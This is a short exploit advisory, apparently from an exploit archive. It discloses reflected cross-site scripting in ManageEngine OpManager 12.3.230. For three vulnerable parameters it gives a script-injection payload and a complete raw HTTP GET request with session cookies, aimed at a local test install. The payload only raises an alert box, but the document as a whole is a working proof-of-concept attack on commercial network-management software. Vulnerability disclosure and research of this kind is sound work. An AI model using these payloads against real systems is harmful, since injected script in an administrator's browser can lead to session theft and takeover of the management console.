# Exploit Title: ManageEngine OpManager 12.3.230 Cross-Site Scripting
# Date: 29.11.2018
# Exploit Author: "Furkan Sayım" from Seccops - Siber Güvenlik Hizmetleri (https://seccops.com)
# Vendor Homepage: https://www.manageengine.com/
# Software Link: https://www.manageengine.com/cgi-bin/download_exe?id=4-806-2018-11-29-12-34-12-7271
# Version: 12.3.230
# Tested on: Windows 10
# Vulernability Type : Cross-site Scripting
# CVE: -
Vulnerability: http://localhost:8060/apiclient/ember/googleMap.jsp?widgetId=
Payload: '"--></style></scRipt><scRipt>alert("SeccopsSiberGuvenlikHizmetleri")</scRipt>
HTTP Request:
GET /apiclient/ember/googleMap.jsp?widgetId=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(%22SeccopsSiberGuvenlikHizmetleri%22)%3C/scRipt%3E HTTP/1.1
Host: localhost:8060
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: f2RedirectUrl=http%3A%2F%2Flocalhost%3A8060%2Fapiclient%2Fember%2Findex.jsp%23%2FSettings%2FBasic%2FMail; encryptPassForAutomaticSignin=82a3161ad68e57b6; userNameForAutomaticSignin=admin; domainNameForAutomaticSignin=Authenticator; signInAutomatically=true; authrule_name=Authenticator; JSESSIONID=E6E9B94C25A6ED265D4479E053B31823; NFA__SSO=CBF02EFBF3870822C071502B78AE989C; opmcsrfcookie=c27ae172-2394-4aae-a515-04054c4fc975
Connection: close
---------------------
Vulnerability: http://localhost:8060/apiclient/ember/rdpdirect.jsp?server=
Payload: '"--></style></scRipt><scRipt>alert("SeccopsSiberGuvenlikHizmetleri")</scRipt>
HTTP Request:
GET /apiclient/ember/rdpdirect.jsp?server=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(%22SeccopsSiberGuvenlikHizmetleri%22)%3C/scRipt%3E HTTP/1.1
Host: localhost:8060
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: f2RedirectUrl=http%3A%2F%2Flocalhost%3A8060%2Fapiclient%2Fember%2Findex.jsp%23%2FSettings%2FBasic%2FMail; encryptPassForAutomaticSignin=82a3161ad68e57b6; userNameForAutomaticSignin=admin; domainNameForAutomaticSignin=Authenticator; signInAutomatically=true; authrule_name=Authenticator; JSESSIONID=E6E9B94C25A6ED265D4479E053B31823; NFA__SSO=CBF02EFBF3870822C071502B78AE989C; opmcsrfcookie=c27ae172-2394-4aae-a515-04054c4fc975
Connection: close
---------------------
Vulnerability: http://localhost:8060/apiclient/ember/googleMap.jsp?type=cctv&cctvID=
Payload: '"--></style></scRipt><scRipt>alert("SeccopsSiberGuvenlikHizmetleri")</scRipt>
HTTP Request:
GET /apiclient/ember/googleMap.jsp?type=cctv&cctvID=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(%22SeccopsSiberGuvenlikHizmetleri%22)%3C/scRipt%3E HTTP/1.1
Host: localhost:8060
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: f2RedirectUrl=http%3A%2F%2Flocalhost%3A8060%2Fapiclient%2Fember%2Findex.jsp%23%2FSettings%2FBasic%2FMail; encryptPassForAutomaticSignin=82a3161ad68e57b6; userNameForAutomaticSignin=admin; domainNameForAutomaticSignin=Authenticator; signInAutomatically=true; authrule_name=Authenticator; JSESSIONID=E6E9B94C25A6ED265D4479E053B31823; NFA__SSO=CBF02EFBF3870822C071502B78AE989C; opmcsrfcookie=c27ae172-2394-4aae-a515-04054c4fc975
Connection: close
